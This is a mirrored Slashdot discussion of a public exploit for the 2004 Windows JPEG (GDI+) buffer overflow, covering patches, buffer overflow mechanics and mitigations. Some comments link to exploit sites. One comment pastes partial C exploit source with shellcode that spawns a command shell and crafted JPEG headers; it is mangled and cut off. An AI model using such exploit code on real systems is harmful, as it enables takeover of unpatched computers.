Slashdot Mirror

← Back to Stories (view on slashdot.org)

Public Exploit For Windows JPEG Bug

Posted by michael on from the here-comes-the-worm dept.

Khoo writes "A sample program hit the Internet on Wednesday, showing by example how malicious coders could compromise Windows computers by using a flaw in the handling of a widespread graphics format by Microsoft's software. Security professionals expect the release of the program to herald a new round of attacks by viruses and Trojan horses incorporating the code to circumvent security on Windows computers that have not been updated. The flaw, in the way Microsoft's software processes JPEG graphics, could allow a program to take control of a victim's computer when the user opens a JPEG file." We mentioned this earlier.

36 of 509 comments (clear)

  1. Patch is Already Out by darkmeridian · · Score: 5, Informative

    The patch for this one is already out. Furthermore, SP2 systems do not have this vulnerability unless Office is installed. SP2 by default has auto-updates enabled. And for Office to be exploited in a SP2 system, the user has to open the file manually.

    Code is always buggy. Even Firefox had a JPEG vulnerability of its own. This is dumb ownership, if this bug becomes prevalent.

    --
    A NYC lawyer blogs. http://www.chuangblog.com/
    1. Re:Patch is Already Out by maxwell+demon · · Score: 5, Informative

      Well, you know, that's called a software bug. A software bug is by definition something you didn't intend.

      Actually, it's a buffer overflow. A buffer overflow means that there is some area of memory reserved for some data, and then there's more data written to it than fits in. This causes some other data to be overwritten; if that other data happens to be a return address (basically a number which tells the computer where to continue after finishing the current task), then you can get the computer to execute arbitrary code which is in memory - including the code you just conveniently placed into the memory as "image data".

      I don't know details of the JPEG image format, but with a simple bitmap format, a buffer overflow might happen as follows:

      The image contains the number of pixels, and the bytes per pixel. The program takes those numbers, multiplies them, and reserves that much memory to take the pixel values. Then it reads the rest of the file as image data into that memory.

      Now, this simple program for this simple image format may be easily exploited: Just put more data into the image than the product of number of pixels and bytes per pixel. Then the program as written will not reserve enough memory for that data (because the values at the beginning don't tell the truth), and therefore the data will overwrite anything following the data.

      Ok, the fix is easy: Don't read more data than you allocated memory for. The problem is that on one hand, there are C standard functions which make it easy to get that wrong, and second, there can be more subtle ways to produce the same result. For example, the multiplication could overflow, resulting in too little memory being allocated, while the given number of pixels is read in (under the believe that you have reserved enough memory for that).

      And yes, buffer overflows happen in open source software as well as in Microsoft software.

      --
      The Tao of math: The numbers you can count are not the real numbers.
    2. Re:Patch is already out by BoldAC · · Score: 5, Informative

      Come on guys! This is slashdot!

      Where is the downloadable link to the second proof of concept code?

      Here's the link to the first POC:
      http://www.gulftech.org/?node=downloads

      The first POC just generates the buffer overflow crash. Interesting enough, on an unpatched system, just having the jpg on your desktop caused by explorer to crash - repeatedly. I am assuming as XP tried to generate the thumbnail. However, if viewed through a web page, I could view it fine.

      I've been looking for the second POC code since yesterday. It supposedly opens a cmd prompt when the crafted jpg is viewed.

      AC

    3. Re:Patch is already out by Trigun · · Score: 5, Informative

      http://www.k-otik.com/
      You can find it all there, including a C program that fires off a local cmd shell.

      Only for use as a security lesson and ethical hacking.

    4. Re:Patch is already out by KidHash · · Score: 4, Informative

      Which isn't really that helpful, however, there's space for 2500 bytes of shell code (ie, lots of space left in the example on k-otik) for writing something with a reverse-shell - in fact, this has already been done, it just isn't public There's also a newer example on k-otik Which adds an administrator account to the system it runs on, however, you'll have to edit some of the code yourself - script-kiddy-proof.

    5. Re:Patch is Already Out by Junks+Jerzey · · Score: 4, Informative

      That's pretty low man. I've coded plenty before and I've never encountered an instance where I can't check to see if a buffer overflow has occurred. I can't help but feel that all of these exploits are just sloppy programming.

      It isn't sloppy programming as much as the rules having changed. It used to be that you'd write an image decoder (or *any* program that reads an external file format), and you'd either (a) assume that the file structure is correct (because if it isn't, then it had to be created by a bad encodder), or (b) do some rudimentary checking to catch basic problems (such as a missing file id tag in the first bytes). And the worst that could usually happen was that your decoder would crash or become unstable. Really, this is how things have been, how coders have worked. Remember, it applies to every single type of external data read into a program: serialized data saved by library classes in C++, Python, etc., bytecode files read by a virtual machine or other interpreter, help file indices, intermediate object files...everything.

      Moreso, just because you don't have buffer overruns doesn't mean you're in the clear. You have to check for tremendous files, too. What if someone passes you an image file that's correct and compressed, but decompresses into a 100,000 by 100,000 32-bit image? Even if you had the memory to decode a large file, the resources it takes up makes it essentiallly a denial of service attack.

      These are tough issues.

    6. Re:Patch is Already Out by strider44 · · Score: 2, Informative

      Most people just call both circumstances "buffer overflow", even though there's a subtle difference.
      Anyway it's not that easy - forgetting to check for buffer size is an easy mistake to make, even though it is an extremely bad one to make. Most of the time it's not even evident looking at the code specifically looking for buffer overflow possibilities.

    7. Re:Patch is Already Out by drinkypoo · · Score: 2, Informative

      The difference is that it actually works in MacOS. Because MacOS is now Unix programs have a Unix context. You can see the context of your shell by running the "id" program (this is in cygwin, which is what I have handiest):

      uid=11008(service) gid=10513(Domain Users) groups=0(root),545(Users),10513(Domain Users),11071(Matric),11040(Tech),11233(visio2000)

      Unix programs spawned from a prior program always inherit the user context of the spawning process. On Windows, this is simply not true. I don't know if there's two ways to launch programs, with one causing the explorer to do it, but that seems like what's going on, because if I Run As... an installer (shift-right click will show it in the context menu) then maybe half the time it actually runs as the chosen user. Most of the time the second stage of the installer spawns with MY permissions, and I can't complete an install. Properly constructed installers, of course, will ask you if you want to elevate privileges when you run them, but I assume that's a relatively new option of installshield.

      The short form is that "sudo" (or as microsoft has it, run as... from the menu or the runas command) is not a valid solution on Windows because it doesn't work. It would be nice, though.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  2. Re:Spammers by don_carnage · · Score: 4, Informative

    HTML-formatted email + Outlook = Bad day for Grandma.

    --
    Wooden armaments to battle your imaginary foes!
  3. Single sign-on for a browser? by Anonymous Coward · · Score: 0, Informative

    Can you elaborate about the single sign-on function you want? I can image what single sign-on is in relation to a file server, but I'm not sure how a browser would use this.

    1. Re:Single sign-on for a browser? by pcardno · · Score: 4, Informative

      You can do something with Active Directory to enable single sign on so that your browser can use your Windows credentials to figure out who you are.

      An example being that I log into my laptop on the corporate network in the morning, but then never need to log into our Intranet. It uses my Active Directory credentials to figure out who I am, so displays my own customised and personalised Intranet settings.

      I'm not too sure how it works but it's very handy!

      --
      --- Band: Joey Ultra
    2. Re:Single sign-on for a browser? by silence535 · · Score: 2, Informative

      It is called NTML authentication.

      -jsl

      --
      Dyslectics of the world, untie!
    3. Re:Single sign-on for a browser? by silence535 · · Score: 2, Informative

      It is already built in. Only hast to be activated per Server.

      - about:config
      - filter for ntlm
      - enter comma separated list for network.automatic-ntlm-auth.trusted-uris

      Voila!

      -jsl

      --
      Dyslectics of the world, untie!
  4. Patch is already out by Jeffv323 · · Score: 5, Informative

    Pick your OS and download it here

    Also, if you have SP2 or uh, don't use MS software, you're fine :)

    --
    I'm a minister!
  5. Re:So what? Burn all JPEGs day? by Ford+Prefect · · Score: 4, Informative

    Shall we announce a "Burn all JPEGs" day because of Microsoft security issues now and switch all to PNG?

    Well, you could, but don't forget the recent bugs in libpng... ;-)

    --
    Tedious Bloggy Stuff - hooray?
  6. patch has been available for a while now by jeffs72 · · Score: 5, Informative

    And it actually works fairly well. It scans for any program that reads these files and makes sure they don't have the bug in them. If it can't patch them, it bugs you about it so you can find a fix for the app. Only Microsoft apps of course, I don't think Adobe wants Microsoft pushing out software updates for them.

    Most of the users I have to support aren't savvy enough to add a printer (omg, with active directory it's like 3 mouse clicks) or install software or apply updates (we use some banking software and it notifies you with a text box to click "OK" and then "File, Update" but I still get called on it every time). That's why at our offices we use Microsoft System Update Server (SUS). It lets us approve patches and then roll them out to all the clients in the domain automagically.

    I shudder to think what would happen if I tried to roll out firefox or mozilla to everyone. I'd probably get calls that their "e" was missing and they couldn't connect to the internet. I swear, some people just shouldn't be on computers.

    --
    This article has recently been linked from Slashdot. Please keep an eye on the page history for errors or vandalism.
  7. Re:Patch already out by Jeffv323 · · Score: 3, Informative

    Pick your OS and download it here!

    Of course here, is this place --> here

    I knew that preview button was good for something

    --
    I'm a minister!
  8. Re:Can someone confirm... by Soul-Burn666 · · Score: 2, Informative

    I can't confirm for 100%, but I can confirm there was a similar exploit for the JPEG rendering system Firefox uses, and it is patched at 1.0PR, and _maybe_ in previous versions.

    --
    ^_^
  9. Re:Can someone confirm... by darkmeridian · · Score: 3, Informative
    ...because I have not seen this mentioned at all.

    Is the JPEG rendering in Firefox running on Windows independent of any underlying MS library and is therefore not affected?


    It is independent of all MS libraries. The recent JPEG vulnerability in Firefox is a separate issue. Firefox is OSS, and thus cannot use closed-source libraries such as the MS one in trouble.
    --
    A NYC lawyer blogs. http://www.chuangblog.com/
  10. Re:Can someone confirm... by Sanity · · Score: 4, Informative
    The recent JPEG vulnerability in Firefox is a separate issue. Firefox is OSS, and thus cannot use closed-source libraries such as the MS one in trouble.
    If that were true, then you wouldn't be able to use OSS on a non-OSS operating system, since eventually the OSS needs to link with non-OSS code.
  11. Re:PNG too? by Deviate_X · · Score: 5, Informative

    Some related exploits.

    Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)

    Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit

    XV BMP XV v3.x bmp parsing local buffer overflow Exploit

    GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit

    LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit


  12. Re:Hard to patch by mikechant · · Score: 2, Informative

    Yes, and also note that the not totally clear wording in the MS article might lead (for example) one to think that you are safe in Win98 because MS lists it in the 'Software not affected' list. But IE6 *is* affected even if you are running it on Win98.

  13. Re:Almost... by YrWrstNtmr · · Score: 4, Informative
    Many companies use outlook as a mail client. Someone could simply include a jpeg image to the mail and since images are loaded by default,

    OL2003 has image loading off by default. "RightClick to display this image."
    Of course, most people are on earlier versions, but at least MS is putting in an effort to stem the tide.

  14. Comment removed by account_deleted · · Score: 4, Informative

    Comment removed based on user account deletion

  15. Comment removed by account_deleted · · Score: 2, Informative

    Comment removed based on user account deletion

  16. Link by fearlezz · · Score: 2, Informative

    I don't see a link to the sample exploit in the article...

    well, here is one link.

    --
    .sig: No such file or directory
  17. AutoUpdate not good enuff by DanMc · · Score: 5, Informative
    Autoupdate and Windowsupdate only install a fraction of the patches released for this bug. (Windows OS and IE basically)

    WindowsUpdate does install a "GDI+ Detection Tool", but I have run this tool on systems with unpatched Visual Studio, Outlook, and Office and it does not detect that the patches are missing. I looked at the strings in this tool, and it basically looks like it checks for MS Photo software.

    Manually visiting "officeupdate.microsoft.com" and running those updates will probably cover the most common attack vectors (Outlook, Word), but how many people do this on a regular basis? My users are not admin-level (yet) so they can't use this update site.

    Incidentally, every default configuration of IE/Word I have seen allows DOC files with jpegs to be opened in the browser window with no prompting. It will not be hard to get people to run the exploits, and there's plenty of ways for worms to automate themselves without users opening things.

    I'm working on a script to detect and run the patches (there's about 17 of them for this bug) but it's going to be a while because of the pre-reqs for many of the patches, and the very specific revisions that must match the patch. "If Visio 2002 is installed, detect which Visio SP level is running. If it's SP0 or SP1, run Visio SP2, then reboot, and run GDI patch"...

    Sorry if I'm spreading panic, but this bug sucks.

  18. Re:Almost... by AstroDrabb · · Score: 4, Informative
    We use Netegrity as well. However we went against the single sign-on thing since it was less secure. Our users get stopped by a Netegrity form and enter their username password and then can go to any corporate intranet web app without signing in again until they close their browser or the session expires (about every hour). Firefox/Mozilla already support Windows authentication for single sign-on. It prompts a user for their name and password instead of just silently sending it. The user can even check a "remember password/username" option so they don't have to enter it again. Some management tried to get the admins to turn on windows authentication with Netegrity but the admins and we programmers stood our ground and said how bad an idea it was. Our users can get to all types of personal information and personal financial information on our corporate intranet. It is really dumb to not authenticate a user at least once per session. If a user walked away from their desktop without locking it (happens all the time), anyone could walk up to their box and get to all their personal data if we used just windows authentication. We do have a policy that locks a desktop after 15 minutes, however that is still a 15 minute windows for someone to do get to someone elses personal and financial data.

    Tell your management to turn off the Netegrity/windows authentication and use Netegrity form authentiation over SSL. Also, there is no reason why your users cannot user Firefox/Mozilla since it has had cross-platform support for Windows authentication for a few versions now.

    --
    If Tyranny and Oppression come to this land,
    it will be in the guise of fighting a foreign enemy. -James Madison
  19. Re:Almost... by tcr · · Score: 4, Informative

    Now, to convince my company's managers to switch their userbase to Firefox

    Before we get too smug, the article (anyone read those?) did mention an (albeit unrelated) vulnerability in Moz amongst others (PNG support) from August. Reproduced below.

    To avoid getting the flameproofs on, I should point out that Firefox is my browser of choice. But let's avoid the whole stones and greenhouses scenario, yeh?


    update Six vulnerabilities in an open-source image format could allow intruders to compromise computers running Linux and may allow attacks against Windows PCs as well as Macs running OS X.

    The security issues appear in a library supporting the portable network graphics (PNG) format, used widely by programs such as the Mozilla and Opera browsers and various e-mail clients. The most critical issue, a memory problem known as a buffer overflow, could allow specially created PNG graphics to execute a malicious program when the application loads the image.

    Among the programs that use libPNG and are likely to be affected by the flaws are the Mail application on Apple Computer's Mac OS X, the Opera and Internet Explorer browsers on Windows, and the Mozilla and Netscape browsers on Solaris, according to independent security researcher Chris Evans, who discovered the issues.

    --


    Information wants to be beer.
  20. Re:Almost... by Gentlewhisper · · Score: 2, Informative

    "Why anyone would use msn messenger is beyond me, I hate that thing. It's more annoying than clippy. They just need a soundbyte with it that yells "you've got spam!" and it'll be complete."

    I've got just the right thing for you!
    http://tmp.infosynaptics.com/spammail.wav

    --
    Online backup with Mozy, sounds like Ozzie, but more!
  21. Re:Almost... by dtfinch · · Score: 4, Informative

    This usually works:
    rundll32 advpack.dll,LaunchINFSection %systemRoot%\INF\msmsgs.inf,BLC.Remove

  22. Re:hmm someone predicted this by stromthurman · · Score: 4, Informative

    And for further information, the virus MacAfee reported on was called Perrun. You can read more about it here. The advisory was issued in mid 2002, and is entirely seperate from the issue at hand.

    --
    I have discovered a truly remarkable sig which this margin is too small to contain.
  23. It does by Rayban · · Score: 2, Informative

    Check out the setting "network.automatic-ntlm-auth.trusted-uris". It will automatically send your Windows credentials to any URL listed in the comma-separated list.

    --
    æeee!
  24. OSS browsers have similar probs by TheLink · · Score: 3, Informative

    They're written in the notorious "buffer overflow" languages, so most people will have these problems for the near future.

    Meanwhile what you can do is to run each program as a different more restricted user.

    On windows XP, run IE with using a shortcut with a runas with savecred (you should modify those in the start menu and quick launch too), and set it so it runs using a very restricted account. The restricted account should either have access to your bookmarks, history and temporary files, or you should run it so it changes to the restricted user's home directory and you allow your main account access to the restricted user's home directory.

    Look up the runas command for the options. It'll be more convenient on WinXP since there's the savecred feature.

    On UNIX, I think you can use sudo or something similar. Sudo to a restricted account and then run the browser.

    This way, if your program gets exploited it can only ruin what the restricted user has access to, it can't easily touch the rest of the system.

    Exploits can still theoretically touch the rest of the system since there's stuff like shatter attacks (for windows, not sure about KDE/GNOME), and I'm sure display drivers have bugs of their own and they run in ring 0 (on windows).

    But if you do this it raises the bar significantly.

    There are other options if you're really paranoid and don't mind the extra effort.

    --
  25. Re:win2k by julesh · · Score: 2, Informative

    Here's the copy I tested with (compiles with just about any C compiler, I used MS Visual C++ with the command line "cl /MD exploit.c"). I've disassembled the shell code to be sure it does what's claimed, and it seems legit to me.

    // Lameness filter doesn't like C code....
    //aksdnckdnaslcjknasdcjknasdlcnjklasdncj klasdnckldnscjkldnaslcjkansdjklcnasljkcnaalksdjncl ajksdnclka
    //asdjkcnhladksjcnklasdjcnklasdjnclajk sdncklasndlckjansdcjknalsdkclaksdjcnlajkdnclaknldj klaegfjkaehg
    //12345kjbfjwerv7890werw14hbfwjfbkjk 2jksnksbhcjksbckjhbkdbakjbdkcjbskcjabkyuajwjbhawhj fgasdiouchacbk
    //aduicyga897schjawegiuci7akcajhwb vekjhcaw78cyakdjachbdjkka7w6ieucbdihcbajksdhbciauy cguaddbiua76teui
    //jkasdbcdbhsajkbhsdcabsdjkcbkad kcabscadcbasbdcabddsbcasdcbascdbcasbdcadcbdasbcasb cjhabscadjkasdbckj
    //ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    //ZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZ
    //ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    //jkasdb cdbhsajkbhsdcabsdjkcbkadkcabscadcbasbdcabddsbcasdc bascdbcasbdcadcbdasbcasbcjhabscadjkasdbckj

    // GDI+ buffer overrun exploit by FoToZ
    // NB: the headers here are only sample headers taken from a .JPG file,
    // with the FF FE 00 01 inserted in header1.
    // Sample shellcode is provided
    // You can put approx. 2500 bytes of shellcode...who needs that much anyway
    // Tested on an unpatched WinXP SP1

    #include <direct.h>
    #include <stdio.h>

    char shellcode[]=
    "\x68" // push
    "cmd "
    "\x8B\xC4" // mov eax,esp
    "\x50" // push eax
    "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1)
    "\xFF\xD0" // call eax
    ;

    char header1[]=
    "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\ x46\x00\x01\x02\x00\x00\x64"
    "\x00\x64\x00\x00\xF F\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
    "\ x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x6 4\x6F\x62\x65"
    "\x00\x64\xC0\x00\x00\x00\x01\xFF\ xFE\x00\x01\x00\x14\x10\x10\x19"
    "\x12\x19\x27\x1 7\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
    "\x2E\x3E\x35\x35\x35\x35\x35\x3E";

    char setNOPs1[]=
    "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
    " \x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\x D9\x75\xF8";

    char setNOPs2[]=
    "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B "
    "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x 3B\xD9\x75\xF8";

    char header2[]=
    "\x44"
    "\x44\x44\x44\x44\x44\x44\x44\ x44\x44\x44\x44\x44\x01\x15\x19\x19"
    "\x20\x1C\x2 0\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\ x2B"
    "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x4 4\x44\x44\x44\x44\x44"
    "\x44\x44\x44\x44\x44\x44\ x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
    "\x44\x4 4\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\ xC0\x00"
    "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x0 0\x02\x11\x01\x03\x11\x01"
    "\xFF\xC4\x00\xA2\x00\ x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
    "\x0 0\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\ x01\x01\x01"
    "\x01\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x01\x00\x02"
    "\x03\x10\x00\x02\ x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
    "\x05\x01\x0

  26. The concept isn't new by Reziac · · Score: 2, Informative

    I've *always* scanned ALL files -- because even in the DOS era, you could never rely on the extension and the functionality having anything to do with one another. (Remember XTreeGold for DOS? the *.XTP files are *executables*, called by XTG.EXE as needed.)

    Occasionally even then, the front end of a virus was named whatever.com and was itself "clean" (so would be passed by most scanners), but its job was to call the REAL executable, named something like whatever.dat, which contained the virus code (and if you limited your scanner to known-executables, it would be missed). I have personally seen a virus carried in the whatever.dat part of some purported utility.

    As to viruses in image files, it has always been theoretically possible to execute code placed in a GIF's comment field, and I vaguely recall there was a similar exploit possible for JPGs. The only reason this GIF exploit was never seen in the wild is because in the olden days, you couldn't count on everyone using the same viewing software; there were dozens of DOS image viewers, no two of which worked alike. NOW, a virus author can pretty much count on the majority of users using such files thru some combination of Windows, IE, and M$Office, so such formerly-obscure tricks become worth the bother. Much more so when M$ kindly offers malware authors a leg up like this. :(

    --
    ~REZ~ #43301. Who'd fake being me anyway?